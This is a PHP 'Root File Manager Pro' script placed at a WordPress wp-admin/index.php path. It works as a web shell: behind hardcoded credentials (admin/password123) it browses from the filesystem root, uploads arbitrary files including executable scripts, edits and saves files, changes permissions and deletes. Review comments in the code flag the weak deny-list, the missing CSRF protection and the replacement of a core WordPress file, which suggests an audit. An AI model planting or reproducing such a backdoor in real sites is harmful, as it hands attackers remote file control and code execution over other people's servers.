File: C:/Apache24/htdocs/wp-admin/index.php
<?php
/**
* Advanced PHP File Manager - Root Access
* Security: Basic Auth + Path Restrictions
*/
// ===== CONFIGURATION ===== //
// NOTE(review): the listing header places this file at wp-admin/index.php under an
// Apache document root. A stock WordPress install ships its own file at that path,
// so compare against a known-good copy of the installed release.

// Credentials for the HTTP Basic check below. Both are plaintext string literals,
// so anyone who can read this file can read them.
$valid_username = 'admin';
$valid_password = 'password123'; // CHANGE THIS PASSWORD!

// Security: allow root access? (true/false)
// NOTE(review): in this listing the flag is only consulted for the literal
// `dir=root` shortcut; any other `dir` value is resolved with realpath()
// whatever this is set to.
$allow_root_access = true;

// Maximum allowed path depth (0 = unlimited)
// NOTE(review): no other line in this listing reads $max_depth, so no depth
// limit is actually applied.
$max_depth = 10;

// Restricted directories (will be hidden).
// This is a deny-list: every path that does not match an entry stays reachable.
// NOTE(review): the entries are POSIX paths, while the listing header shows a
// Windows location (C:/...). Presumably none of them match there; confirm on the host.
$restricted_dirs = [
    '/etc',
    '/proc',
    '/sys',
    '/var/log',
    '/root',
    '/home/*/.*', // hidden user folders
];

// Allowed file extensions for editing.
// Only the Edit button and the edit panel consult this list; the `save` POST
// handler further down does not.
$editable_extensions = [
    'php', 'txt', 'html', 'css', 'js', 'json',
    'xml', 'md', 'log', 'conf', 'ini',
];
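// ===== AUTHENTICATION ===== //
// HTTP Basic authentication against $valid_username / $valid_password.
// Both values are compared with hash_equals() and both comparisons always run,
// so response timing does not show which field (or how much of it) was wrong.
// NOTE(review): there is no attempt limit or lockout here, and Basic credentials
// travel with every request, so this is only as strong as the password and the
// transport (TLS) in front of it.
$has_credentials = isset($_SERVER['PHP_AUTH_USER'], $_SERVER['PHP_AUTH_PW']);
$user_ok = hash_equals((string) $valid_username, (string) ($_SERVER['PHP_AUTH_USER'] ?? ''));
$pass_ok = hash_equals((string) $valid_password, (string) ($_SERVER['PHP_AUTH_PW'] ?? ''));
if (!$has_credentials || !$user_ok || !$pass_ok) {
    // The realm string is sent verbatim in the 401 challenge.
    header('WWW-Authenticate: Basic realm="Root File Manager"');
    header('HTTP/1.0 401 Unauthorized');
    echo 'Authentication Required';
    exit;
}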
// ===== SECURITY FUNCTIONS ===== //
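/**
 * Decide whether a path may be listed or acted on.
 *
 * The path is canonicalised with realpath() first, so symlinks and `..`
 * segments are resolved before matching. A path that cannot be resolved
 * (including one that does not exist yet) is rejected.
 *
 * Each deny-list entry is applied twice: as an fnmatch() glob against the
 * whole canonical path, and as a directory prefix. The prefix test respects
 * the separator boundary, so an entry such as `/etc` covers `/etc` and
 * everything beneath it but not a sibling such as `/etcetera`.
 *
 * This is a deny-list check only: anything not matched is allowed.
 *
 * @param string   $path            Path to test.
 * @param string[] $restricted_dirs Glob patterns / directory prefixes to refuse.
 * @return bool True when the path resolves and matches no entry.
 */
function is_path_allowed($path, $restricted_dirs) {
    $real_path = realpath($path);
    if ($real_path === false) {
        return false; // fail closed on anything that cannot be canonicalised
    }
    foreach ($restricted_dirs as $restricted) {
        if (fnmatch($restricted, $real_path)) {
            return false;
        }
        // Compare on a whole path component, not on a raw string prefix.
        $restricted_root = rtrim($restricted, '/\\');
        if ($real_path === $restricted
            || $real_path === $restricted_root
            || str_starts_with($real_path, $restricted_root . DIRECTORY_SEPARATOR)) {
            return false;
        }
    }
    return true;
}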
/**
 * Build the shortcut list shown in the "Quick Navigation" bar.
 *
 * Entries are added in a fixed order: filesystem root, this script's
 * directory, then $_SERVER['HOME'] and $_SERVER['DOCUMENT_ROOT'] when set.
 * Paths are array keys, so when two sources name the same path the later
 * label replaces the earlier one.
 *
 * @return array<string, string> Map of path => display label.
 */
function get_root_paths() {
    $shortcuts = [];

    // Linux/Unix root
    if (is_dir('/')) {
        $shortcuts['/'] = 'System Root (/)';
    }

    // Directory containing this script
    $shortcuts[__DIR__] = 'Current Directory';

    // Locations taken from the server environment, when present
    $from_server = [
        'HOME' => 'Home Directory',
        'DOCUMENT_ROOT' => 'Web Root',
    ];
    foreach ($from_server as $server_key => $label) {
        if (isset($_SERVER[$server_key])) {
            $shortcuts[$_SERVER[$server_key]] = $label;
        }
    }

    return $shortcuts;
}
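// ===== INITIALIZATION ===== //
$base_path = __DIR__;

// `dir` comes straight from the query string. A non-string value (for example
// `dir[]=x`) is discarded here so that it never reaches realpath(), which
// throws a TypeError on an array under PHP 8.
$requested_dir = $_GET['dir'] ?? $base_path;
if (!is_string($requested_dir)) {
    $requested_dir = $base_path;
}

// Resolve the requested directory.
// NOTE(review): $allow_root_access only gates the literal keyword `root`. Any
// other value, absolute paths included, is canonicalised by realpath() in the
// else branch. The only confinement afterwards is the deny-list check below.
if ($requested_dir === 'root' && $allow_root_access) {
    $current_dir = '/';
} else {
    // Unresolvable input falls back to the script's own directory.
    $current_dir = realpath($requested_dir) ?: $base_path;
}

// Apply the deny-list; a refused path is replaced by the script directory.
if (!is_path_allowed($current_dir, $restricted_dirs)) {
    $current_dir = $base_path;
    $message = "Access to requested path is restricted!";
}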
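// ===== FILE OPERATIONS ===== //
$action = $_GET['action'] ?? 'list';
// Keep a notice raised earlier in the request (the path check sets one) instead
// of unconditionally blanking it.
$message = $message ?? '';
if ($_POST) {
    // NOTE(review): every branch below changes server state and none of them
    // carries an anti-CSRF token. Browsers attach Basic credentials automatically,
    // so a token bound to the authenticated user belongs on each form.
    //
    // All names go through basename(), so an operation is confined to direct
    // children of $current_dir. Request fields are required to be strings before
    // use; array-valued fields would otherwise raise a TypeError in basename().
    $action = $_POST['action'] ?? '';
    switch ($action) {
        case 'upload':
            // NOTE(review): the stored name and extension are whatever the client
            // sent, and the target is not passed through is_path_allowed(). If
            // $current_dir is served by the web server, an uploaded script becomes
            // executable content.
            if (isset($_FILES['file'])) {
                $upload = $_FILES['file'];
                $upload_ok = is_string($upload['name'] ?? null)
                    && is_string($upload['tmp_name'] ?? null)
                    && ($upload['error'] ?? UPLOAD_ERR_NO_FILE) === UPLOAD_ERR_OK;
                if (!$upload_ok) {
                    $message = "❌ Upload failed!";
                    break;
                }
                $target_file = $current_dir . '/' . basename($upload['name']);
                if (move_uploaded_file($upload['tmp_name'], $target_file)) {
                    $message = "✅ File uploaded successfully!";
                } else {
                    $message = "❌ Upload failed!";
                }
            }
            break;

        case 'delete':
            $requested_name = $_POST['file'] ?? null;
            if (!is_string($requested_name)) {
                $message = "❌ Invalid request!";
                break;
            }
            $file_to_delete = $current_dir . '/' . basename($requested_name);
            if (is_path_allowed($file_to_delete, $restricted_dirs)) {
                if (is_dir($file_to_delete)) {
                    // rmdir() only removes empty directories.
                    if (rmdir($file_to_delete)) {
                        $message = "✅ Directory deleted!";
                    }
                } else {
                    if (unlink($file_to_delete)) {
                        $message = "✅ File deleted!";
                    }
                }
            } else {
                $message = "❌ Cannot delete restricted item!";
            }
            break;

        case 'mkdir':
            $requested_name = $_POST['dirname'] ?? null;
            if (!is_string($requested_name)) {
                $message = "❌ Invalid request!";
                break;
            }
            $new_dir = $current_dir . '/' . basename($requested_name);
            if (is_path_allowed($new_dir, $restricted_dirs)) {
                if (!file_exists($new_dir)) {
                    mkdir($new_dir, 0755, true);
                    $message = "✅ Directory created!";
                }
            } else {
                $message = "❌ Cannot create directory in restricted location!";
            }
            break;

        case 'save':
            // NOTE(review): $editable_extensions is not consulted here; it only
            // controls which files get an Edit button in the page.
            $requested_name = $_POST['filename'] ?? null;
            $new_content = $_POST['content'] ?? null;
            if (!is_string($requested_name) || !is_string($new_content)) {
                $message = "❌ Invalid request!";
                break;
            }
            $file_to_save = $current_dir . '/' . basename($requested_name);
            if (is_path_allowed($file_to_save, $restricted_dirs)) {
                file_put_contents($file_to_save, $new_content);
                $message = "✅ File saved!";
            } else {
                $message = "❌ Cannot save to restricted location!";
            }
            break;

        case 'chmod':
            // The form's pattern="[0-7]{3,4}" is enforced only by the browser, so
            // the same rule is applied here before octdec() sees the value.
            $requested_name = $_POST['file'] ?? null;
            $requested_perms = $_POST['perms'] ?? null;
            if (!is_string($requested_name)
                || !is_string($requested_perms)
                || preg_match('/\A[0-7]{3,4}\z/', $requested_perms) !== 1) {
                $message = "❌ Invalid request!";
                break;
            }
            $file_to_chmod = $current_dir . '/' . basename($requested_name);
            $new_perms = octdec($requested_perms);
            if (is_path_allowed($file_to_chmod, $restricted_dirs)) {
                if (chmod($file_to_chmod, $new_perms)) {
                    $message = "✅ Permissions changed!";
                }
            }
            break;
    }
}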
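// ===== GET DIRECTORY CONTENTS ===== //
// Builds $files, one metadata row per visible entry of $current_dir.
$files = [];
$parent_dir = dirname($current_dir);

// scandir() returns false when the directory cannot be read; treat that the
// same as "not a directory" rather than iterating over false.
$items = is_dir($current_dir) ? scandir($current_dir) : false;
if ($items !== false) {
    foreach ($items as $item) {
        if ($item === '.' || $item === '..') continue;
        $full_path = $current_dir . '/' . $item;

        // Skip restricted paths. is_path_allowed() canonicalises with realpath(),
        // so an entry whose target cannot be resolved is dropped here as well.
        if (!is_path_allowed($full_path, $restricted_dirs)) continue;

        // Resolve the owner name defensively: the posix extension may be missing,
        // and the lookup returns false for a uid with no passwd entry.
        $owner_name = 'N/A';
        if (function_exists('posix_getpwuid')) {
            $owner_uid = fileowner($full_path);
            $owner_info = $owner_uid === false ? false : posix_getpwuid($owner_uid);
            $owner_name = $owner_info['name'] ?? 'N/A';
        }

        $files[] = [
            'name' => $item,
            'path' => $full_path,
            'is_dir' => is_dir($full_path),
            'size' => is_file($full_path) ? filesize($full_path) : 0,
            'modified' => date('Y-m-d H:i:s', filemtime($full_path)),
            // last four octal digits of the mode, e.g. "0644"
            'perms' => substr(sprintf('%o', fileperms($full_path)), -4),
            'owner' => $owner_name,
            'readable' => is_readable($full_path),
            'writable' => is_writable($full_path),
        ];
    }
}

// Sort: directories first, then byte-wise by name.
usort($files, static function ($a, $b) {
    if ($a['is_dir'] !== $b['is_dir']) {
        return $a['is_dir'] ? -1 : 1;
    }
    return strcmp($a['name'], $b['name']);
});

$root_paths = get_root_paths();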
?>
<!DOCTYPE html>
<html>
<head>
<title>Root File Manager Pro</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
* { margin: 0; padding: 0; box-sizing: border-box; }
body { font-family: 'Segoe UI', Arial, sans-serif; background: #1e1e1e; color: #e0e0e0; padding: 20px; }
.container { max-width: 1400px; margin: 0 auto; background: #2d2d2d; padding: 20px; border-radius: 8px; box-shadow: 0 4px 20px rgba(0,0,0,0.3); }
.header { display: flex; justify-content: space-between; align-items: center; margin-bottom: 20px; padding-bottom: 15px; border-bottom: 1px solid #444; }
.message { background: #155724; color: #d4edda; padding: 12px; margin-bottom: 15px; border-radius: 4px; border-left: 4px solid #28a745; }
.message.error { background: #721c24; color: #f8d7da; border-left-color: #dc3545; }
.breadcrumb { margin-bottom: 15px; font-size: 14px; color: #aaa; padding: 10px; background: #363636; border-radius: 4px; }
.file-list { border: 1px solid #444; border-radius: 4px; overflow: hidden; }
.file-item { display: flex; align-items: center; padding: 12px; border-bottom: 1px solid #444; transition: background 0.2s; }
.file-item:hover { background: #363636; }
.file-icon { width: 30px; text-align: center; margin-right: 12px; font-size: 16px; }
.file-info { flex: 1; }
.file-name { font-weight: 500; margin-bottom: 4px; }
.file-meta { font-size: 11px; color: #888; }
.file-actions { display: flex; gap: 6px; flex-wrap: wrap; }
.btn { padding: 6px 12px; border: none; border-radius: 4px; cursor: pointer; text-decoration: none; font-size: 12px; transition: all 0.2s; }
.btn:hover { transform: translateY(-1px); }
.btn-primary { background: #007bff; color: white; }
.btn-danger { background: #dc3545; color: white; }
.btn-success { background: #28a745; color: white; }
.btn-warning { background: #ffc107; color: black; }
.btn-info { background: #17a2b8; color: white; }
.btn-secondary { background: #6c757d; color: white; }
.tools { margin-bottom: 15px; display: flex; gap: 10px; flex-wrap: wrap; padding: 15px; background: #363636; border-radius: 4px; }
.form-group { margin-bottom: 10px; }
input[type="text"], input[type="file"], input[type="number"], select { padding: 8px; border: 1px solid #555; border-radius: 4px; width: 100%; background: #2d2d2d; color: #e0e0e0; }
textarea { width: 100%; height: 500px; padding: 15px; border: 1px solid #555; border-radius: 4px; font-family: 'Consolas', monospace; background: #1e1e1e; color: #e0e0e0; resize: vertical; }
.quick-nav { margin-bottom: 15px; }
.nav-buttons { display: flex; gap: 8px; flex-wrap: wrap; }
.system-info { background: #363636; padding: 15px; border-radius: 4px; margin-bottom: 15px; font-size: 12px; }
.info-grid { display: grid; grid-template-columns: repeat(auto-fit, minmax(200px, 1fr)); gap: 10px; }
.modal { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.8); z-index: 1000; }
.modal-content { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); background: #2d2d2d; padding: 20px; border-radius: 8px; min-width: 400px; }
</style>
</head>
<body>
<div class="container">
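<div class="header">
<h1>🚀 Root File Manager Pro</h1>
<?php
// SERVER_NAME is HTML-escaped before output. Depending on server configuration
// it can be derived from the request's Host header, so it is not trusted markup.
?>
<div style="color: #28a745;">● Online | Server: <?php echo htmlspecialchars((string) ($_SERVER['SERVER_NAME'] ?? ''), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?></div>
</div>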
<?php if($message): ?>
<div class="message <?php echo strpos($message, '❌') !== false ? 'error' : ''; ?>"><?php echo htmlspecialchars($message); ?></div>
<?php endif; ?>
<!-- System Information -->
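<div class="system-info">
<?php
// Status panel. The current path and the server banner are HTML-escaped:
// directory names on disk may contain markup characters, and the banner is
// server-supplied text.
// NOTE(review): the panel shows the PHP version and server software to every
// authenticated visitor.
?>
<div class="info-grid">
<div><strong>Current Path:</strong> <?php echo htmlspecialchars((string) $current_dir, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?></div>
<div><strong>PHP Version:</strong> <?php echo PHP_VERSION; ?></div>
<div><strong>Disk Free:</strong> <?php echo round(disk_free_space($current_dir) / (1024*1024*1024), 2); ?> GB</div>
<div><strong>Server Software:</strong> <?php echo htmlspecialchars((string) ($_SERVER['SERVER_SOFTWARE'] ?? ''), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?></div>
</div>
</div>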
<!-- Quick Navigation -->
<div class="quick-nav">
<h3>📍 Quick Navigation</h3>
<div class="nav-buttons">
<?php foreach($root_paths as $path => $label): ?>
<a href="?dir=<?php echo urlencode($path); ?>" class="btn btn-secondary"><?php echo $label; ?></a>
<?php endforeach; ?>
<?php if($parent_dir && $current_dir !== '/'): ?>
<a href="?dir=<?php echo urlencode($parent_dir); ?>" class="btn btn-info">📁 Parent Directory</a>
<?php endif; ?>
</div>
</div>
<!-- Breadcrumb -->
<div class="breadcrumb">
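<?php
// Breadcrumb: split $current_dir into its components and print one link per
// ancestor, root first.
$path_parts = [];
$temp_path = $current_dir;
while ($temp_path !== '/' && $temp_path !== '') {
    $parent_path = dirname($temp_path);
    // dirname() of a filesystem root returns that root unchanged. For a root
    // other than "/" (e.g. a Windows drive root) the loop condition alone would
    // never become false, so stop as soon as no progress is made.
    if ($parent_path === $temp_path) {
        break;
    }
    $path_parts[] = basename($temp_path);
    $temp_path = $parent_path;
}
$path_parts[] = '/';
$path_parts = array_reverse($path_parts);

// Rebuild the cumulative path while emitting links. The href value is
// URL-encoded and the visible label is HTML-escaped.
$current_path = '';
foreach ($path_parts as $part) {
    if ($part === '/') {
        echo '<a href="?dir=/" style="color: #ffc107;">🏠 Root</a>';
        $current_path = '/';
    } else {
        $current_path .= ($current_path === '/' ? '' : '/') . $part;
        echo ' / <a href="?dir=' . urlencode($current_path) . '">' . htmlspecialchars($part) . '</a>';
    }
}
?>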
</div>
<!-- Tools -->
<div class="tools">
<form method="post" enctype="multipart/form-data" style="display: inline;">
<input type="file" name="file" required>
<button type="submit" name="action" value="upload" class="btn btn-success">📤 Upload</button>
</form>
<form method="post" style="display: inline;">
<input type="text" name="dirname" placeholder="New folder name" required style="min-width: 150px;">
<button type="submit" name="action" value="mkdir" class="btn btn-primary">📁 Create Folder</button>
</form>
<a href="?dir=<?php echo urlencode($current_dir); ?>&action=newfile" class="btn btn-warning">📄 New File</a>
<?php if(isset($_GET['action']) && $_GET['action'] == 'newfile'): ?>
<form method="post" style="display: inline;">
<input type="text" name="filename" placeholder="newfile.php" required style="min-width: 120px;">
<button type="submit" name="action" value="createfile" class="btn btn-info">Create</button>
</form>
<?php endif; ?>
</div>
<!-- File List -->
<div class="file-list">
<?php if(empty($files)): ?>
<div class="file-item" style="justify-content: center; color: #888;">
📭 Directory is empty or access restricted
</div>
<?php else: ?>
<?php foreach($files as $file): ?>
<div class="file-item">
<div class="file-icon">
<?php
if ($file['is_dir']) {
echo '📁';
} else {
$ext = pathinfo($file['name'], PATHINFO_EXTENSION);
echo match($ext) {
'php' => '🐘',
'js' => '📜',
'html', 'htm' => '🌐',
'css' => '🎨',
'json' => '📋',
'txt', 'md' => '📝',
'log' => '📊',
'zip', 'tar', 'gz' => '📦',
'jpg', 'jpeg', 'png', 'gif' => '🖼️',
default => '📄'
};
}
?>
</div>
<div class="file-info">
<div class="file-name">
<?php if($file['is_dir']): ?>
<a href="?dir=<?php echo urlencode($file['path']); ?>" style="color: #4da6ff; text-decoration: none;">
<strong><?php echo htmlspecialchars($file['name']); ?></strong>
</a>
<?php else: ?>
<?php echo htmlspecialchars($file['name']); ?>
<?php endif; ?>
</div>
<div class="file-meta">
<?php if($file['is_dir']): ?>
📂 Directory |
<?php else: ?>
📏 <?php echo number_format($file['size']); ?> bytes |
<?php endif; ?>
🔧 Perms: <?php echo $file['perms']; ?> |
👤 <?php echo $file['owner']; ?> |
🕒 <?php echo $file['modified']; ?>
<?php if(!$file['readable']): ?> | ❌ Unreadable<?php endif; ?>
<?php if(!$file['writable']): ?> | 🔒 Locked<?php endif; ?>
</div>
</div>
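<div class="file-actions">
<?php
// File names are attacker-influenceable data (anything can be uploaded or
// created on disk). Inside an inline onclick handler, HTML escaping alone is not
// enough: the browser decodes entities in the attribute before the script runs,
// so an escaped quote becomes a real quote again. Values destined for JavaScript
// are therefore JSON-encoded first (with the HEX flags, so no quote or angle
// bracket survives unescaped) and HTML-escaped second.
$js_flags = JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP | JSON_INVALID_UTF8_SUBSTITUTE;
$js_name = htmlspecialchars((string) json_encode($file['name'], $js_flags), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
$js_confirm = htmlspecialchars((string) json_encode('❌ Delete ' . $file['name'] . '?', $js_flags), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
?>
<?php if(!$file['is_dir']): ?>
<?php
// The Edit button is offered only for extensions on the editable list.
$ext = pathinfo($file['name'], PATHINFO_EXTENSION);
if(in_array($ext, $editable_extensions, true)):
?>
<a href="?dir=<?php echo urlencode($current_dir); ?>&action=edit&file=<?php echo urlencode($file['name']); ?>" class="btn btn-warning">✏️ Edit</a>
<?php endif; ?>
<a href="?dir=<?php echo urlencode($current_dir); ?>&action=view&file=<?php echo urlencode($file['name']); ?>" class="btn btn-info">👁️ View</a>
<a href="?dir=<?php echo urlencode($current_dir); ?>&action=download&file=<?php echo urlencode($file['name']); ?>" class="btn btn-primary">📥 Download</a>
<!-- Chmod Button -->
<button onclick="showChmodModal(<?php echo $js_name; ?>, '<?php echo $file['perms']; ?>')" class="btn btn-secondary">🔒 Perms</button>
<?php endif; ?>
<form method="post" style="display: inline;">
<input type="hidden" name="file" value="<?php echo htmlspecialchars($file['name']); ?>">
<button type="submit" name="action" value="delete" class="btn btn-danger" onclick="return confirm(<?php echo $js_confirm; ?>)">🗑️ Delete</button>
</form>
</div>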
</div>
<?php endforeach; ?>
<?php endif; ?>
</div>
<!-- File View/Edit -->
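<?php
// Viewer / editor panel. Both request fields are read once and must have the
// expected type. An array-valued `file` would raise a TypeError in basename().
$panel_action = $_GET['action'] ?? null;
$panel_file = $_GET['file'] ?? null;
?>
<?php if(in_array($panel_action, ['view', 'edit'], true) && is_string($panel_file)): ?>
<?php
// basename() confines the lookup to direct children of $current_dir; the
// deny-list is applied to the canonical path by is_path_allowed().
// NOTE(review): viewing is not limited by $editable_extensions. Any regular
// file the PHP process can read outside the deny-list is displayed.
$file_path = $current_dir . '/' . basename($panel_file);
if(file_exists($file_path) && is_file($file_path) && is_path_allowed($file_path, $restricted_dirs)) {
$content = file_get_contents($file_path);
// A failed read must not open an empty editor whose Save would overwrite the file.
$read_ok = ($content !== false);
if (!$read_ok) {
    $content = '';
}
$is_editable = $read_ok && ($panel_action === 'edit') && in_array(pathinfo($file_path, PATHINFO_EXTENSION), $editable_extensions, true);
?>
<div style="margin-top: 20px; padding: 20px; background: #363636; border-radius: 8px;">
<div style="display: flex; justify-content: space-between; align-items: center; margin-bottom: 15px;">
<h3><?php echo $is_editable ? '✏️ Edit' : '👁️ View'; ?>: <?php echo htmlspecialchars($panel_file); ?></h3>
<div>
<?php if(!$is_editable): ?>
<a href="?dir=<?php echo urlencode($current_dir); ?>&action=edit&file=<?php echo urlencode($panel_file); ?>" class="btn btn-warning">✏️ Edit</a>
<?php endif; ?>
<a href="?dir=<?php echo urlencode($current_dir); ?>" class="btn btn-secondary">Close</a>
</div>
</div>
<?php if($is_editable): ?>
<form method="post">
<input type="hidden" name="action" value="save">
<input type="hidden" name="filename" value="<?php echo htmlspecialchars($panel_file); ?>">
<textarea name="content" placeholder="File content..."><?php echo htmlspecialchars($content); ?></textarea>
<div style="margin-top: 10px; display: flex; gap: 10px;">
<button type="submit" class="btn btn-success">💾 Save</button>
<a href="?dir=<?php echo urlencode($current_dir); ?>&action=view&file=<?php echo urlencode($panel_file); ?>" class="btn">Cancel</a>
</div>
</form>
<?php else: ?>
<pre style="background: #1e1e1e; padding: 20px; border-radius: 4px; overflow: auto; max-height: 600px; border: 1px solid #444;"><?php echo htmlspecialchars($content); ?></pre>
<?php endif; ?>
</div>
<?php } ?>
<?php endif; ?>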
</div>
<!-- Chmod Modal -->
<div id="chmodModal" class="modal">
<div class="modal-content">
<h3>🔒 Change Permissions</h3>
<form method="post" id="chmodForm">
<input type="hidden" name="action" value="chmod">
<input type="hidden" name="file" id="chmodFile">
<div class="form-group">
<label>Current Permissions: <span id="currentPerms"></span></label>
<input type="text" name="perms" id="chmodValue" placeholder="e.g., 755" pattern="[0-7]{3,4}" required>
<small>Common: 755 (rwxr-xr-x), 644 (rw-r--r--), 777 (rwxrwxrwx)</small>
</div>
<div style="margin-top: 15px; display: flex; gap: 10px;">
<button type="submit" class="btn btn-success">Apply</button>
<button type="button" onclick="document.getElementById('chmodModal').style.display='none'" class="btn btn-secondary">Cancel</button>
</div>
</form>
</div>
</div>
<script>
// Fill the permissions dialog for one file and reveal it.
// `filename` goes into the hidden form field; `currentPerms` is shown as text
// and pre-filled as the editable value.
function showChmodModal(filename, currentPerms) {
    var byId = function (id) {
        return document.getElementById(id);
    };
    byId('chmodFile').value = filename;
    byId('currentPerms').textContent = currentPerms;
    byId('chmodValue').value = currentPerms;
    byId('chmodModal').style.display = 'block';
}
// Dismiss the permissions dialog when the click lands on its backdrop, i.e. on
// the modal element itself rather than on anything inside it.
window.onclick = function (event) {
    var backdrop = document.getElementById('chmodModal');
    if (event.target != backdrop) {
        return;
    }
    backdrop.style.display = 'none';
}
// Ask for a file name and open the edit view for it in the current directory.
// The directory part is URL-encoded by PHP when the page is rendered; the name
// typed by the user is encoded in the browser. Nothing in the visible page
// calls this function.
function createNewFile() {
    var requestedName = prompt('Enter filename:');
    if (!requestedName) {
        return;
    }
    var editUrl = '?dir=<?php echo urlencode($current_dir); ?>&action=edit&file=' + encodeURIComponent(requestedName);
    window.location.href = editUrl;
}
</script>
</body>
</html>